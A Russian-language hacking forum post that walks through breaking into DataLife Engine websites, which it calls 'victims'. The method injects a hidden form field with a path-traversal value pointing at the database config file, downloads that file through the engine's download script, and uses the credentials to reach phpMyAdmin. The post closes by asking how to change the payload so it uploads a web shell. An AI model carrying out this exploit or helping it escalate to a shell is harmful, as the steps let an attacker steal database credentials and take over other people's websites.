kokatub
Сообщений: 6
Оценки: 0
Присоединился: 2008-11-30 14:01:42.820000
|
Нужна помощь.
Взломал дле по такой системе :
1. Заходим на сайт жертвы
2. Регистрируемся и авторизуемся
3. Переходим по ссылке http://адрес_сайта.ru/engine/images.php (где адрес_сайта.ru – адрес жертвы)
4. Открываем исходный код открытой нами страницы и после строки(она может немного отличаться и повторяться 2 раза, вставляем после 1-ой)
<input type="hidden" name="area" value=''/>
вставляем
<input type="hidden" name="serverfile" value='../../engine/data/dbconfig.php'/>
Нажимаем в браузере, под вкладками – Применить изменения
5. После этих действий необходимо проверить работоспособность дырки, для этого на странице http://адрес_сайта.ru/engine/images.php, нажимаем – Загрузить. В списке загруженных файлов должен появиться dbconfig.php, в нем находится информация которая поможет попасть к БД сайта(phpMyAdmin), которая находится чаще всего по адресу - адрес_сайта.ru/myadmin/ или адрес_сайта.ru/phpmyadmin/
Для скачивания файла конфигурации мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:
<a href="http://адрес_сайта.ru/engine/download.php?id=ID_файла">[download]</a>
А как можна написать вместо этого <input type="hidden" name="serverfile" value='../../engine/data/dbconfig.php'/>
что бы залить шелл?
|
DLE зилв шелла - 
